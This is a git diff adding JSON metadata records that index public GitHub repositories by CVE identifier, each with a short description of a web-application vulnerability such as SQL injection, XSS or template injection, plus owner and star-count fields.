/dev/null +++ b/2023/CVE-2023-49964.json @@ -0,0 +1,43 @@ +[ + { + "id": 729296630, + "name": "CVE-2023-49964", + "full_name": "mbadanoiu\/CVE-2023-49964", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-49964", + "description": "CVE-2023-49964: FreeMarker Server-Side Template Injection in Alfresco", + "fork": false, + "created_at": "2023-12-08T20:47:52Z", + "updated_at": "2024-08-12T20:33:05Z", + "pushed_at": "2023-12-09T10:54:03Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2020-12873", + "cve-2023-49964", + "cves", + "remote-code-execution", + "server-side-template-injection" + ], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49965.json b/2023/CVE-2023-49965.json new file mode 100644 index 0000000000..bff7547bad --- /dev/null +++ b/2023/CVE-2023-49965.json @@ -0,0 +1,33 @@ +[ + { + "id": 826664850, + "name": "SpaceX-Starlink-Router-Gen-2-XSS", + "full_name": "yoshida-git-ai\/SpaceX-Starlink-Router-Gen-2-XSS", + "owner": { + "login": "yoshida-git-ai", + "id": 94094919, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94094919?v=4", + "html_url": "https:\/\/github.com\/yoshida-git-ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoshida-git-ai\/SpaceX-Starlink-Router-Gen-2-XSS", + "description": "CVE-2023-49965 | SpaceX \/ Starlink Router Gen 2 XSS ", + "fork": false, + "created_at": "2024-07-10T06:28:16Z", + "updated_at": "2024-07-10T06:28:16Z", + "pushed_at": "2024-04-10T16:39:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49968.json b/2023/CVE-2023-49968.json new file mode 100644 index 0000000000..ea5c864e5f --- /dev/null +++ b/2023/CVE-2023-49968.json @@ -0,0 +1,33 @@ +[ + { + "id": 733689714, + "name": "CVE-2023-49968", + "full_name": "geraldoalcantara\/CVE-2023-49968", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49968", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in manage_department.php via \"id\" URL Parameter", + "fork": false, + "created_at": "2023-12-19T22:45:22Z", + "updated_at": "2023-12-20T09:48:23Z", + "pushed_at": "2023-12-20T08:30:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49969.json b/2023/CVE-2023-49969.json new file mode 100644 index 0000000000..a464bf723e --- /dev/null +++ b/2023/CVE-2023-49969.json @@ -0,0 +1,33 @@ +[ + { + "id": 733693627, + "name": "CVE-2023-49969", + "full_name": "geraldoalcantara\/CVE-2023-49969", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49969", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in edit_customer via \"id\" URL Parameter", + "fork": false, + "created_at": "2023-12-19T23:02:09Z", + "updated_at": "2023-12-20T09:49:01Z", + "pushed_at": "2023-12-20T08:32:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49970.json b/2023/CVE-2023-49970.json new file mode 100644 index 0000000000..ee4881e33d --- /dev/null +++ b/2023/CVE-2023-49970.json @@ -0,0 +1,33 @@ +[ + { + "id": 733695939, + "name": "CVE-2023-49970", + "full_name": "geraldoalcantara\/CVE-2023-49970", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49970", + "description": "Customer Support System 1.0 - SQL Injection Vulnerability in the \"subject\" Parameter During \"save_ticket\" Operation", + "fork": false, + "created_at": "2023-12-19T23:12:29Z", + "updated_at": "2023-12-20T09:49:52Z", + "pushed_at": "2023-12-20T08:34:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49971.json b/2023/CVE-2023-49971.json new file mode 100644 index 0000000000..f5bbd97e36 --- /dev/null +++ b/2023/CVE-2023-49971.json @@ -0,0 +1,33 @@ +[ + { + "id": 733716638, + "name": "CVE-2023-49971", + "full_name": "geraldoalcantara\/CVE-2023-49971", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49971", + "description": "Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the \"firstname\" parameter at \"customer_list", + "fork": false, + "created_at": "2023-12-20T00:55:22Z", + "updated_at": "2023-12-20T09:50:27Z", + "pushed_at": "2023-12-20T08:42:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49973.json b/2023/CVE-2023-49973.json new file mode 100644 index 0000000000..9f0ccb05b4 --- /dev/null +++ b/2023/CVE-2023-49973.json @@ -0,0 +1,33 @@ +[ + { + "id": 733723468, + "name": "CVE-2023-49973", + "full_name": "geraldoalcantara\/CVE-2023-49973", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49973", + "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"email\" field\/parameter on \"customer_list\" Page", + "fork": false, + "created_at": "2023-12-20T01:26:22Z", + "updated_at": "2023-12-20T09:51:00Z", + "pushed_at": "2023-12-20T08:48:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49974.json b/2023/CVE-2023-49974.json new file mode 100644 index 0000000000..b989723cf5 --- /dev/null +++ b/2023/CVE-2023-49974.json @@ -0,0 +1,33 @@ +[ + { + "id": 733724496, + "name": "CVE-2023-49974", + "full_name": "geraldoalcantara\/CVE-2023-49974", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49974", + "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"contact\" field\/parameter on \"customer_list\" Page", + "fork": false, + "created_at": "2023-12-20T01:31:08Z", + "updated_at": "2023-12-20T09:51:39Z", + "pushed_at": "2023-12-20T01:34:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49976.json b/2023/CVE-2023-49976.json new file mode 100644 index 0000000000..ad18a40ebf --- /dev/null +++ b/2023/CVE-2023-49976.json @@ -0,0 +1,33 @@ +[ + { + "id": 724641524, + "name": "CVE-2023-49976", + "full_name": "geraldoalcantara\/CVE-2023-49976", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49976", + "description": " Customer Support System 1.0 is vulnerable to stored XSS. A XSS vulnerability exists in version 1 of the Customer Support System. A malicious actor can insert JavaScript code through the \"subject\" field when editing\/creating a ticket. ", + "fork": false, + "created_at": "2023-11-28T13:53:45Z", + "updated_at": "2023-12-20T09:52:28Z", + "pushed_at": "2023-12-20T01:05:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49977.json b/2023/CVE-2023-49977.json new file mode 100644 index 0000000000..21181816e4 --- /dev/null +++ b/2023/CVE-2023-49977.json @@ -0,0 +1,33 @@ +[ + { + "id": 733727150, + "name": "CVE-2023-49977", + "full_name": "geraldoalcantara\/CVE-2023-49977", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49977", + "description": "Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in \"Address\" field\/parameter on \"customer_list\" Page", + "fork": false, + "created_at": "2023-12-20T01:43:06Z", + "updated_at": "2023-12-20T09:53:04Z", + "pushed_at": "2023-12-20T01:49:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49978.json b/2023/CVE-2023-49978.json new file mode 100644 index 0000000000..a2595b9f98 --- /dev/null +++ b/2023/CVE-2023-49978.json @@ -0,0 +1,33 @@ +[ + { + "id": 733728970, + "name": "CVE-2023-49978", + "full_name": "geraldoalcantara\/CVE-2023-49978", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49978", + "description": "Customer Support System 1.0 - Incorrect Access Control", + "fork": false, + "created_at": "2023-12-20T01:51:28Z", + "updated_at": "2023-12-20T09:53:46Z", + "pushed_at": "2023-12-20T02:04:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49979.json b/2023/CVE-2023-49979.json new file mode 100644 index 0000000000..0ccbe6fc74 --- /dev/null +++ b/2023/CVE-2023-49979.json @@ -0,0 +1,33 @@ +[ + { + "id": 733745008, + "name": "CVE-2023-49979", + "full_name": "geraldoalcantara\/CVE-2023-49979", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49979", + "description": "Best Student Management System v1.0 - Incorrect Access Control - Directory Listing", + "fork": false, + "created_at": "2023-12-20T03:01:53Z", + "updated_at": "2023-12-20T09:54:36Z", + "pushed_at": "2023-12-20T03:22:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49980.json b/2023/CVE-2023-49980.json new file mode 100644 index 0000000000..e40b7e4be6 --- /dev/null +++ b/2023/CVE-2023-49980.json @@ -0,0 +1,33 @@ +[ + { + "id": 724635472, + "name": "CVE-2023-49980", + "full_name": "geraldoalcantara\/CVE-2023-49980", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49980", + "description": "Best Student Result Management System 1.0 - Directory Listing CVE-2023-49980", + "fork": false, + "created_at": "2023-11-28T13:40:06Z", + "updated_at": "2023-12-20T09:55:11Z", + "pushed_at": "2023-12-19T20:12:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49981.json b/2023/CVE-2023-49981.json new file mode 100644 index 0000000000..dc8d13b16f --- /dev/null +++ b/2023/CVE-2023-49981.json @@ -0,0 +1,33 @@ +[ + { + "id": 733749059, + "name": "CVE-2023-49981", + "full_name": "geraldoalcantara\/CVE-2023-49981", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49981", + "description": "School Fees Management System v1.0 - Incorrect Access Control - Directory Listing", + "fork": false, + "created_at": "2023-12-20T03:19:09Z", + "updated_at": "2023-12-20T09:55:44Z", + "pushed_at": "2023-12-20T09:21:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49982.json b/2023/CVE-2023-49982.json new file mode 100644 index 0000000000..de1ab83df9 --- /dev/null +++ b/2023/CVE-2023-49982.json @@ -0,0 +1,33 @@ +[ + { + "id": 733754634, + "name": "CVE-2023-49982", + "full_name": "geraldoalcantara\/CVE-2023-49982", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49982", + "description": "School Fees Management System v1.0 - Incorrect Access Control - Privilege Escalation", + "fork": false, + "created_at": "2023-12-20T03:44:16Z", + "updated_at": "2023-12-20T09:56:25Z", + "pushed_at": "2023-12-20T03:45:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49983.json b/2023/CVE-2023-49983.json new file mode 100644 index 0000000000..84a59c2cdb --- /dev/null +++ b/2023/CVE-2023-49983.json @@ -0,0 +1,33 @@ +[ + { + "id": 733757280, + "name": "CVE-2023-49983", + "full_name": "geraldoalcantara\/CVE-2023-49983", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49983", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" field\/parameter on \"\/management\/class\"", + "fork": false, + "created_at": "2023-12-20T03:56:16Z", + "updated_at": "2023-12-20T09:57:00Z", + "pushed_at": "2023-12-20T09:25:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49984.json b/2023/CVE-2023-49984.json new file mode 100644 index 0000000000..2e258f4a64 --- /dev/null +++ b/2023/CVE-2023-49984.json @@ -0,0 +1,33 @@ +[ + { + "id": 733759340, + "name": "CVE-2023-49984", + "full_name": "geraldoalcantara\/CVE-2023-49984", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49984", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" field\/parameter on \"\/management\/settings\"", + "fork": false, + "created_at": "2023-12-20T04:06:00Z", + "updated_at": "2023-12-20T09:57:47Z", + "pushed_at": "2023-12-20T09:26:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49985.json b/2023/CVE-2023-49985.json new file mode 100644 index 0000000000..a7e13ad3c7 --- /dev/null +++ b/2023/CVE-2023-49985.json @@ -0,0 +1,33 @@ +[ + { + "id": 733760666, + "name": "CVE-2023-49985", + "full_name": "geraldoalcantara\/CVE-2023-49985", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49985", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"cname\" parameter on \"new_class\"", + "fork": false, + "created_at": "2023-12-20T04:12:02Z", + "updated_at": "2023-12-20T09:58:25Z", + "pushed_at": "2023-12-20T09:29:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49986.json b/2023/CVE-2023-49986.json new file mode 100644 index 0000000000..bd9bab1f67 --- /dev/null +++ b/2023/CVE-2023-49986.json @@ -0,0 +1,33 @@ +[ + { + "id": 733762762, + "name": "CVE-2023-49986", + "full_name": "geraldoalcantara\/CVE-2023-49986", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49986", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"name\" parameter on \"add_new_parent\"", + "fork": false, + "created_at": "2023-12-20T04:21:46Z", + "updated_at": "2023-12-20T09:59:09Z", + "pushed_at": "2023-12-20T04:28:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49987.json b/2023/CVE-2023-49987.json new file mode 100644 index 0000000000..bb60dc329c --- /dev/null +++ b/2023/CVE-2023-49987.json @@ -0,0 +1,33 @@ +[ + { + "id": 733764792, + "name": "CVE-2023-49987", + "full_name": "geraldoalcantara\/CVE-2023-49987", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49987", + "description": "School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in \"tname\" parameter on \"new_term\"", + "fork": false, + "created_at": "2023-12-20T04:30:49Z", + "updated_at": "2023-12-20T09:59:43Z", + "pushed_at": "2023-12-20T04:34:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49988.json b/2023/CVE-2023-49988.json new file mode 100644 index 0000000000..dcb2ba15f0 --- /dev/null +++ b/2023/CVE-2023-49988.json @@ -0,0 +1,33 @@ +[ + { + "id": 733766007, + "name": "CVE-2023-49988", + "full_name": "geraldoalcantara\/CVE-2023-49988", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49988", + "description": "Hotel Booking Management v1.0 - SQL Injection Vulnerability in the \"npss\" parameter at rooms.php", + "fork": false, + "created_at": "2023-12-20T04:36:35Z", + "updated_at": "2023-12-20T10:00:28Z", + "pushed_at": "2023-12-20T09:35:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49989.json b/2023/CVE-2023-49989.json new file mode 100644 index 0000000000..5b0837994c --- /dev/null +++ b/2023/CVE-2023-49989.json @@ -0,0 +1,33 @@ +[ + { + "id": 733768261, + "name": "CVE-2023-49989", + "full_name": "geraldoalcantara\/CVE-2023-49989", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-49989", + "description": "Hotel Booking Management v1.0 - SQL Injection Vulnerability in the \"id\" parameter at update.php", + "fork": false, + "created_at": "2023-12-20T04:46:28Z", + "updated_at": "2023-12-20T10:01:07Z", + "pushed_at": "2023-12-20T09:37:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50029.json b/2023/CVE-2023-50029.json new file mode 100644 index 0000000000..c765829c60 --- /dev/null +++ b/2023/CVE-2023-50029.json @@ -0,0 +1,33 @@ +[ + { + "id": 819640713, + "name": "PHP-Injection-in-M4-PDF-Extensions", + "full_name": "absholi7ly\/PHP-Injection-in-M4-PDF-Extensions", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/PHP-Injection-in-M4-PDF-Extensions", + "description": "CVE-2023-50029: PHP Injection Vulnerability in M4 PDF Extensions Module", + "fork": false, + "created_at": "2024-06-24T23:26:05Z", + "updated_at": "2024-06-24T23:31:50Z", + "pushed_at": "2024-06-24T23:31:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50070.json b/2023/CVE-2023-50070.json new file mode 100644 index 0000000000..0f740565d5 --- /dev/null +++ b/2023/CVE-2023-50070.json @@ -0,0 +1,33 @@ +[ + { + "id": 732171989, + "name": "CVE-2023-50070", + "full_name": "geraldoalcantara\/CVE-2023-50070", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-50070", + "description": "Multiple SQL injection vulnerabilities in \/customer_support\/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, customer_id and subject.", + "fork": false, + "created_at": "2023-12-15T20:37:39Z", + "updated_at": "2024-02-16T12:23:24Z", + "pushed_at": "2023-12-29T23:05:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50071.json b/2023/CVE-2023-50071.json new file mode 100644 index 0000000000..8c76864f12 --- /dev/null +++ b/2023/CVE-2023-50071.json @@ -0,0 +1,33 @@ +[ + { + "id": 732511226, + "name": "CVE-2023-50071", + "full_name": "geraldoalcantara\/CVE-2023-50071", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-50071", + "description": "Multiple SQL injection vulnerabilities in \/customer_support\/ajax.php?action=save_department in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via id or name.", + "fork": false, + "created_at": "2023-12-16T23:06:25Z", + "updated_at": "2024-02-26T02:00:12Z", + "pushed_at": "2024-03-01T11:57:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50072.json b/2023/CVE-2023-50072.json new file mode 100644 index 0000000000..36318215b2 --- /dev/null +++ b/2023/CVE-2023-50072.json @@ -0,0 +1,33 @@ +[ + { + "id": 733963314, + "name": "CVE-2023-50072", + "full_name": "ahrixia\/CVE-2023-50072", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-50072", + "description": "A stored cross-site scripting (XSS) vulnerability exists in OpenKM version 7.1.40.", + "fork": false, + "created_at": "2023-12-20T14:36:01Z", + "updated_at": "2024-11-07T14:34:10Z", + "pushed_at": "2024-01-25T07:14:57Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 